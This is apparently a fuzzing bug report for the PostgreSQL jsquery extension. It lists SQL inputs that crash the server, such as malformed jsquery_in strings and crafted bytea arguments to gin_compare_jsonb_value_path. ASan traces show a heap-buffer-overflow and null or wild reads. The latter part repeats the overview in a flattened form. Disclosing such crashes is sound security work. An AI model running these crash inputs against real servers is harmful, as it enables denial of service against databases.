Overview
While fuzzing jsquery using AFL++ and AddressSanitizer, I discovered a heap memory buffer overflow problem and some SQLs that could crash the PostgreSQL server. This may lead to Denial of Service (DoS) or memory safety violations depending on environment constraints.
Environment
OS: Ubuntu 22.04.5 LTS (x64)
PostgreSQL: 18.0 (./configure --enable-cassert --enable-debug CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1 -fsanitize-recover=address" LDFLAGS="-fsanitize=address" CC=gcc-11 CXX=g++-11), also replicable when compiled with GCC 13.3.0
Extension jsquery: 3073aeb
Extension compilation: CC=afl-clang-fast COPT=-g -O2 -fgnu89-inline -fgnu89-inline -fsanitize=address -fno-omit-frame-pointer (also replicable when compiled with GCC 13.3.0)
AFL++ version: https://github.com/aflplusplus/aflplusplus bf2eac470804df48a1bca6a78d4dd6c71968a556
PostgreSQL setup:
- compile, install
- initdb -D xxx
- install the extension
- createdb
test
- create extension jsquery (on the
test database)
- fuzzing started, feed sqls
- e.g., SELECT public.jsquery_in('/u=.,x');
- ...
Affected Code
jsquery_io.c
jsquery_scan.l
jsquery_gram.y
jsonb_gin_ops.c
jsquery_support.c
Possible SQLs that Trigger the Problem
SELECT public.jsquery_in('/u=.,x'); # crash
SELECT public.jsquery_in('#/T') # crash
SELECT public.jsquery_le(public.jsquery_in('(/3M0'),public.jsquery_in('@')); # crash
# It seems that if the first character of the argument of jsquery_in is /, #, @, ( and more would crash postgres
SELECT public.gin_compare_jsonb_value_path('\x00C5603C4015B6B6D6922683B30BE89B89263AD046FC29F3D60D94B58F758D6B5A301D1970DFDA2283A66A88A14020C16203767335473D011BF0B65A483113'::bytea,'\xB898'::bytea);
SELECT public.gin_compare_jsonb_value_path('\x9F951BC241A7A69648AE1625EA00890FDA72EE18883F944543BCFFB3DA77DC6EF0F648F6F415ADD20891C7028EEB15F648DD36852115FC3DFD3EDA9DC4E88A3D993141AADCEBCCAF3381F179BEE5FBB30323772056DE6674401CD313F14BA32E76E867709882275B180244B16F5257E9C2AABD3639546377439152E9C2C0494381269B00516122003A468255A33DC2AA17DC7E2436647BDE7E51A0B436D686F021DCFCD3D99D32E747ECEA15C43F5CEE081CFAF23633EEB911D0315F414FC7F7619778E129D16FDD3DD1C984F766727E190182A10A539D52CE306F3804BE62FC67121739CEC341E93B66F2F68EB5A510AA3B03650BA9AF21DBD2563D2123E5C858AFC5C877F0733721427628D41F0408F1DC94B2550ED516C0232EA7EC995F9FF2BCB26D446A7A876E70EDED8E7536377BEC350A2F6F8E46D00C487774F5C9C8C7ADBA45A313A9C8BC2DA65332A30767CB51B5E02A69D71287F730602E72A3F3D2205E53A6B8A77C80D679BD2E8684BDAAF8DF426F71C32119388D71C851D50B24CAD018F297F465DB9EB23FA9FEA040D060896335005937BF9A83AA700656C11A1D95A4E20E499B6C3522A9E3F42D0D6EE5AB73BC67767DC91526AFF26695E6F565E539C1D5471F31C1BF01D31CF1766142BF5FCECC393A108DEC171D8D05226860BA7316ABBAE7AD92AEA07C6F7B61850E044F74C882DC787F450395A931'::bytea,'\x991E95'::bytea);
SELECT public.gin_compare_jsonb_value_path('\xBC428BE2A42978D759E21CA01BD06E3F932BC7D8A0F791C86320BF31020FE89AB6A98AA4A26AD6A487A725733994F8E533039BD9E85CB8574A38F1CBF721B141143618794AF60CEE80EA3A7CAAF62C3BBEC577632567CD6AA4A0CD'::bytea,'\x87'::bytea);
ASan trace
=================================================================
==4102318==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000037 (pc 0x7ff09f227140 bp 0x7ffe348b9d00 sp 0x7ffe348b8cc0 T0)
==4102318==The signal is caused by a READ memory access.
==4102318==Hint: address points to the zero page.
#0 0x7ff09f227140 in makeItemList /jsquery/jsquery_gram.y:196
#1 0x7ff09f227140 in jsquery_yyparse /jsquery/jsquery_gram.y:319
#2 0x7ff09f23821e in parsejsquery /jsquery/jsquery_scan.l:396
#3 0x7ff09f238999 in jsquery_in /jsquery/jsquery_io.c:171
#4 0x597e0691ac30 in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:977
#5 0x597e069069c1 in ExecInterpExprStillValid /postgresql-18.0/src/backend/executor/execExprInterp.c:2299
#6 0x597e06ca84fa in ExecEvalExprSwitchContext ../../../../src/include/executor/executor.h:440
#7 0x597e06ca84fa in evaluate_expr /postgresql-18.0/src/backend/optimizer/util/clauses.c:5014
#8 0x597e06cafbd0 in evaluate_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4521
#9 0x597e06cafbd0 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4110
#10 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#11 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#12 0x597e06caf844 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4101
#13 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#14 0x597e06ae7751 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3486
#15 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#16 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#17 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#18 0x597e06caf38b in eval_const_expressions /postgresql-18.0/src/backend/optimizer/util/clauses.c:2270
#19 0x597e06c3e674 in preprocess_expression /postgresql-18.0/src/backend/optimizer/plan/planner.c:1284
#20 0x597e06c5b669 in subquery_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:904
#21 0x597e06c5d972 in standard_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:435
#22 0x597e06c5f8bd in planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:295
#23 0x597e06f5c056 in pg_plan_query /postgresql-18.0/src/backend/tcop/postgres.c:900
#24 0x597e06f5c573 in pg_plan_queries /postgresql-18.0/src/backend/tcop/postgres.c:994
#25 0x597e06f5cf78 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1192
#26 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#27 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#28 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#29 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#30 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#31 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#32 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#33 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#34 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#35 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /jsquery/jsquery_gram.y:196 in makeItemList
==4102318==ABORTING
~
=================================================================
==2294928==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x525000007100 at pc 0x7ff0a2a0d729 bp 0x7ffe348ba2d0 sp 0x7ffe348ba2c0
READ of size 1 at 0x525000007100 thread T0
#0 0x7ff0a2a0d728 in compare_gin_key_value /jsquery/jsonb_gin_ops.c:669
#1 0x7ff0a2a0d0e3 in gin_compare_jsonb_value_path /jsquery/jsonb_gin_ops.c:752
#2 0x597e0691aebb in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:1001
#3 0x597e069069c1 in ExecInterpExprStillValid /postgresql-18.0/src/backend/executor/execExprInterp.c:2299
#4 0x597e06ca84fa in ExecEvalExprSwitchContext ../../../../src/include/executor/executor.h:440
#5 0x597e06ca84fa in evaluate_expr /postgresql-18.0/src/backend/optimizer/util/clauses.c:5014
#6 0x597e06cafbd0 in evaluate_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4521
#7 0x597e06cafbd0 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4110
#8 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#9 0x597e06ae7751 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3486
#10 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#11 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#12 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#13 0x597e06caf38b in eval_const_expressions /postgresql-18.0/src/backend/optimizer/util/clauses.c:2270
#14 0x597e06c3e674 in preprocess_expression /postgresql-18.0/src/backend/optimizer/plan/planner.c:1284
#15 0x597e06c5b669 in subquery_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:904
#16 0x597e06c5d972 in standard_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:435
#17 0x597e06c5f8bd in planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:295
#18 0x597e06f5c056 in pg_plan_query /postgresql-18.0/src/backend/tcop/postgres.c:900
#19 0x597e06f5c573 in pg_plan_queries /postgresql-18.0/src/backend/tcop/postgres.c:994
#20 0x597e06f5cf78 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1192
#21 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#22 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#23 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#24 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#25 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#26 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#27 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#28 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#29 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#30 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
0x525000007100 is located 0 bytes to the right of 8192-byte region [0x525000005100,0x525000007100)
allocated by thread T0 here:
#0 0x7ff0b32b3ec7 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x597e07394511 in AllocSetContextCreateInternal /postgresql-18.0/src/backend/utils/mmgr/aset.c:444
#2 0x597e06d44930 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:530
#3 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#4 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#5 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#6 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
SUMMARY: AddressSanitizer: heap-buffer-overflow /jsquery/jsonb_gin_ops.c:669 in compare_gin_key_value
Shadow bytes around the buggy address:
0x0a4a7fff8dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0a4a7fff8e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0a4a7fff8e20:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0a4a7fff8e70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
=================================================================
==999100==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x597e073aaab2 bp 0x7ffe348b8b40 sp 0x7ffe348b8b30 T0)
==999100==The signal is caused by a READ memory access.
==999100==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x597e073aaab2 in GetMemoryChunkMethodID /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:205
#1 0x597e073aaab2 in GetMemoryChunkContext /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:709
#2 0x597e073acc60 in repalloc /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:1554
#3 0x7ff0a1a30757 in addchar /jsquery/jsquery_scan.l:382
#4 0x7ff0a1a30757 in jsquery_yylex /jsquery/jsquery_scan.l:138
#5 0x7ff0a1a225b9 in jsquery_yyparse /jsquery/jsquery_gram.c:1595
#6 0x7ff0a1a3821e in parsejsquery /jsquery/jsquery_scan.l:396
#7 0x7ff0a1a38999 in jsquery_in /jsquery/jsquery_io.c:171
#8 0x597e0691ac30 in ExecInterpExpr /postgresql-18.0/src/backend/executor/execExprInterp.c:977
#9 0x597e069069c1 in ExecInterpExprStillValid /postgresql-18.0/src/backend/executor/execExprInterp.c:2299
#10 0x597e06ca84fa in ExecEvalExprSwitchContext ../../../../src/include/executor/executor.h:440
#11 0x597e06ca84fa in evaluate_expr /postgresql-18.0/src/backend/optimizer/util/clauses.c:5014
#12 0x597e06cafbd0 in evaluate_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4521
#13 0x597e06cafbd0 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4110
#14 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#15 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#16 0x597e06caf844 in simplify_function /postgresql-18.0/src/backend/optimizer/util/clauses.c:4101
#17 0x597e06ca9633 in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:2595
#18 0x597e06ae7751 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3486
#19 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#20 0x597e06ae7cf1 in expression_tree_mutator_impl /postgresql-18.0/src/backend/nodes/nodeFuncs.c:3572
#21 0x597e06ca896d in eval_const_expressions_mutator /postgresql-18.0/src/backend/optimizer/util/clauses.c:3729
#22 0x597e06caf38b in eval_const_expressions /postgresql-18.0/src/backend/optimizer/util/clauses.c:2270
#23 0x597e06c3e674 in preprocess_expression /postgresql-18.0/src/backend/optimizer/plan/planner.c:1284
#24 0x597e06c5b669 in subquery_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:904
#25 0x597e06c5d972 in standard_planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:435
#26 0x597e06c5f8bd in planner /postgresql-18.0/src/backend/optimizer/plan/planner.c:295
#27 0x597e06f5c056 in pg_plan_query /postgresql-18.0/src/backend/tcop/postgres.c:900
#28 0x597e06f5c573 in pg_plan_queries /postgresql-18.0/src/backend/tcop/postgres.c:994
#29 0x597e06f5cf78 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1192
#30 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#31 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#32 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#33 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#34 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#35 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#36 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#37 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#38 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#39 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /postgresql-18.0/src/backend/utils/mmgr/mcxt.c:205 in GetMemoryChunkMethodID
==999100==ABORTING
=================================================================
==3293476==ERROR: AddressSanitizer: SEGV on unknown address 0x524fbec30582 (pc 0x7ff09f247f39 bp 0x7ffe348baaf0 sp 0x7ffe348baab0 T0)
==3293476==The signal is caused by a READ memory access.
#0 0x7ff09f247f39 in jsqInitByBuffer /jsquery/jsquery_support.c:31
#1 0x7ff09f23a97a in printJsQueryItem /jsquery/jsquery_io.c:410
#2 0x7ff09f23a648 in printJsQueryItem /jsquery/jsquery_io.c
#3 0x7ff09f239efc in jsquery_out /jsquery/jsquery_io.c:447
#4 0x597e07340fba in FunctionCall1Coll /postgresql-18.0/src/backend/utils/fmgr/fmgr.c:1139
#5 0x597e073459de in OutputFunctionCall /postgresql-18.0/src/backend/utils/fmgr/fmgr.c:1685
#6 0x597e06312ce4 in printtup /postgresql-18.0/src/backend/access/common/printtup.c:360
#7 0x597e0692cd76 in ExecutePlan /postgresql-18.0/src/backend/executor/execMain.c:1728
#8 0x597e0692cd76 in standard_ExecutorRun /postgresql-18.0/src/backend/executor/execMain.c:366
#9 0x597e0692d032 in ExecutorRun /postgresql-18.0/src/backend/executor/execMain.c:303
#10 0x597e06f63fee in PortalRunSelect /postgresql-18.0/src/backend/tcop/pquery.c:921
#11 0x597e06f68767 in PortalRun /postgresql-18.0/src/backend/tcop/pquery.c:765
#12 0x597e06f5d120 in exec_simple_query /postgresql-18.0/src/backend/tcop/postgres.c:1273
#13 0x597e06f5effe in PostgresMain /postgresql-18.0/src/backend/tcop/postgres.c:4766
#14 0x597e06f5277c in BackendMain /postgresql-18.0/src/backend/tcop/backend_startup.c:124
#15 0x597e06d3ae5a in postmaster_child_launch /postgresql-18.0/src/backend/postmaster/launch_backend.c:290
#16 0x597e06d43928 in BackendStartup /postgresql-18.0/src/backend/postmaster/postmaster.c:3587
#17 0x597e06d43928 in ServerLoop /postgresql-18.0/src/backend/postmaster/postmaster.c:1702
#18 0x597e06d469e6 in PostmasterMain /postgresql-18.0/src/backend/postmaster/postmaster.c:1400
#19 0x597e06a6d8f6 in main /postgresql-18.0/src/backend/main/main.c:227
#20 0x7ff0b242a1c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9)
#21 0x7ff0b242a28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a)
#22 0x597e062d7b94 in _start (/pgserver/bin/postgres+0x41eb94)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /jsquery/jsquery_support.c:31 in jsqInitByBuffer
==3293476==ABORTING
Expanded C source file
A preprocessed and macro-expanded version of the code can be found
jsonb_gin_ops.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsonb_gin_ops.c
jsquery_io.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsquery_io.c
jsquery_support.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsquery_support.c
Overview
While fuzzing
jsqueryusing AFL++ and AddressSanitizer, I discovered a heap memory buffer overflow problem and some SQLs that could crash the PostgreSQL server. This may lead to Denial of Service (DoS) or memory safety violations depending on environment constraints.Environment
OS: Ubuntu 22.04.5 LTS (x64)
PostgreSQL: 18.0 (./configure --enable-cassert --enable-debug CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O1 -fsanitize-recover=address" LDFLAGS="-fsanitize=address" CC=gcc-11 CXX=g++-11), also replicable when compiled with GCC 13.3.0
Extension jsquery: 3073aeb
Extension compilation: CC=afl-clang-fast COPT=-g -O2 -fgnu89-inline -fgnu89-inline -fsanitize=address -fno-omit-frame-pointer (also replicable when compiled with GCC 13.3.0)
AFL++ version: https://github.com/aflplusplus/aflplusplus bf2eac470804df48a1bca6a78d4dd6c71968a556
PostgreSQL setup:
testtestdatabase)Affected Code
jsquery_io.c
jsquery_scan.l
jsquery_gram.y
jsonb_gin_ops.c
jsquery_support.c
Possible SQLs that Trigger the Problem
ASan trace
Expanded C source file
A preprocessed and macro-expanded version of the code can be found
jsonb_gin_ops.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsonb_gin_ops.c
jsquery_io.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsquery_io.c
jsquery_support.c: https://github.com/gaoxiangliu/fuzzing-dbms-extensions-logs/blob/main/postgresql/jsquery/3073aepg18/jsquery_support.c